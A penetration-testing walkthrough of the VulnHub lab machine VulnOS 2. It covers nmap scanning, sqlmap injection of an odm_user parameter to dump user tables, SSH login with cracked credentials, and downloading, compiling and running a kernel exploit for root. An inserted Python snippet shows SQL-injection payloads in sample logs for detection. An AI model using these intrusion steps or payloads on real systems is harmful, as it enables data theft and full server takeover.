VulnOS: 2 Walkthrough

VulnOS: 2 is a boot-to-root virtual machine hosted on VulnHub.

Description of the challenge
VulnOS are a series of vulnerable operating systems packed as virtual images to enhance penetration testing skills
This is version 2 -
Smaller, less chaotic !
As time is not always on my side, it took a long time to create another VulnOS. But I like creating them. The image is built with VBOX. Unpack the file and add it to your virtualisation software.
Your assignment is to pentest a company website, get root of the system and read the final flag
NOTE : current keyboard preferences is BE “pentesting is a wide concept”
If you have questions, feel free to contact me on m4db33f@gmail dot com Shout out to the Vulnhub Testing team!
Hope you enjoy.

Identify the IP address of VulnOS machine
Nmap Ping Scan

root@kali:~# nmap -sn
Starting Nmap 7.40 ( ) at 2017-05-19 12:31 EDT
Nmap scan report for
Host is up (0.036s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for
Host is up (0.19s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Apple)
Nmap scan report for
Host is up (0.20s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for
Host is up (0.00011s latency).
MAC Address: F4:0F:24:33:5E:D1 (Apple)
Nmap scan report for
Host is up (0.16s latency).
MAC Address: 68:37:E9:88:16:5F (Amazon Technologies)
Nmap scan report for
Host is up (0.00036s latency).
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)

Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 9.22 seconds

Identify services running on VulnOS

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535
Starting Nmap 7.40 ( ) at 2017-05-19 12:32 EDT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:32
Completed NSE at 12:32, 0.00s elapsed
Initiating NSE at 12:32
Completed NSE at 12:32, 0.00s elapsed
Initiating ARP Ping Scan at 12:32
Scanning [1 port]
Completed ARP Ping Scan at 12:32, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:32
Completed Parallel DNS resolution of 1 host. at 12:32, 0.01s elapsed
Initiating Connect Scan at 12:32
Scanning [65535 ports]
Discovered open port 80/tcp on
Discovered open port 22/tcp on
Discovered open port 6667/tcp on
Completed Connect Scan at 12:32, 2.82s elapsed (65535 total ports)
Initiating Service scan at 12:32
Scanning 3 services on
Completed Service scan at 12:32, 11.05s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against
NSE: Script scanning
Initiating NSE at 12:32
Completed NSE at 12:33, 60.16s elapsed
Initiating NSE at 12:33
Completed NSE at 12:33, 0.01s elapsed
Nmap scan report for
Host is up (0.00041s latency).
Not shown: 65532 closed ports
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_ 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Uptime guess: 198.047 days (since Wed Nov 2 11:24:59 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel
1 0.41 ms
NSE: Script Post-scanning.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 76.47 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 16 (1.330KB)

Port 80 — Enumerating http Apache httpd 2.4.7 ((Ubuntu))

Open the URL in the browser.

Let's follow the hyperlink on the page. We are presented with another website.

The documentation tab gives away some information about a new site and its credentials.

Browsing to the folder mentioned there, we reach a new page which gives away the version of the document management system.

Let's search for relevant exploits.

The exploit states that the odm_user parameter is vulnerable to SQL injection.


Running sqlmap to exploit the injection and enumerate admin credentials.

root@kali:~# sqlmap -u "" --dbs --level=5 --risk=3
Output:
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin
root@kali:~# sqlmap -u "" -D jabcd0cs --tables
Output:
Database: jabcd0cs
[15 tables]
| odm_access_log |
| odm_admin |
| odm_category |
| odm_data |
| odm_department |
| odm_dept_perms |
| odm_dept_reviewer |
| odm_filetypes |
| odm_log |
| odm_odmsys |
| odm_rights |
| odm_settings |
| odm_udf |
| odm_user |
| odm_user_perms |
root@kali:~# sqlmap -u "" -D jabcd0cs -T odm_user --dump
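
What a sqlmap run like the one above leaves behind in the web server's access log, as an added detection example that is not part of the original walkthrough. The log lines are constructed, /app/page.php is a placeholder path (the real URL is not shown on this page), and the odm_user parameter name is taken from the exploit description above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: ip - user [time] "METHOD target PROTO" status size "ref" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# SQL syntax that should never appear in a parameter carrying a plain identifier.
SQL_TOKENS = re.compile(
    r"'|\"|--|#|/\*|\bunion\b.+\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|"
    r"\binformation_schema\b|\b(?:and|or)\b\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)
WATCHED_PARAM = "odm_user"  # parameter the page names as injectable

# Constructed sample lines; /app/page.php is a placeholder, not the real URL.
SAMPLE = [
    '192.0.2.10 - - [19/May/2017:18:20:01 +0200] '
    '"GET /app/page.php?odm_user=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [19/May/2017:18:21:14 +0200] "GET /app/page.php?odm_user='
    '3%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 498 "-" "sqlmap/1.1"',
    '192.0.2.66 - - [19/May/2017:18:21:15 +0200] '
    '"GET /app/page.php?odm_user=3%20AND%20SLEEP(5) HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
]

def inspect_line(line):
    """Return the reasons a logged request looks like SQL injection probing."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    if "sqlmap" in m["agent"].lower():
        reasons.append("sqlmap user agent")
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if name == WATCHED_PARAM and SQL_TOKENS.search(value):
            reasons.append("SQL syntax in " + name)
    return reasons

def summarize(lines):
    """Count suspicious requests per client IP."""
    hits = {}
    for line in lines:
        if inspect_line(line):
            ip = LOG_RE.match(line)["ip"]
            hits[ip] = hits.get(ip, 0) + 1
    return hits
```

The user-agent check only catches default sqlmap settings; the parameter check still fires when the agent string is changed, as the third sample line shows.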

Let's try to crack webmin's credentials.

Username : webmin
Password : webmin1980

Let's log in to the machine.

root@kali:~# ssh webmin@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
webmin@'s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation:
System information as of Fri May 19 18:30:25 CEST 2017
System load: 0.0               Memory usage: 5%   Processes:       62
Usage of /: 5.7% of 29.91GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
Last login: Wed May  4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)

Privilege Escalation

$ python -c 'import pty;pty.spawn("/bin/bash")'
webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
webmin@VulnOSv2:~$ cat /etc/lsb-release
webmin@VulnOSv2:~$ file /bin/ls
/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=cecbb9e27978d91bc6fe2cc4d46d0cd58deafdb2, stripped

Searching for privilege escalation exploits using the information gathered.

Let's root the server.

webmin@VulnOSv2:~$ cd /tmp
webmin@VulnOSv2:/tmp$ wget
--2017-05-19 20:06:06--
Resolving (
Connecting to (||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: ‘37292’
100%[======================================>] 5,123       --.-K/s   in 0s
2017-05-19 20:06:07 (38.5 MB/s) - ‘37292’ saved [5123/5123]
webmin@VulnOSv2:/tmp$ ls
webmin@VulnOSv2:/tmp$ mv 37292 ofs.c
webmin@VulnOSv2:/tmp$ gcc ofs.c -o ofs
webmin@VulnOSv2:/tmp$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
webmin@VulnOSv2:/tmp$ ./ofs

spawning threads
mount #1
mount #2
child threads done
/etc/ created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?

Happy Hacking !!!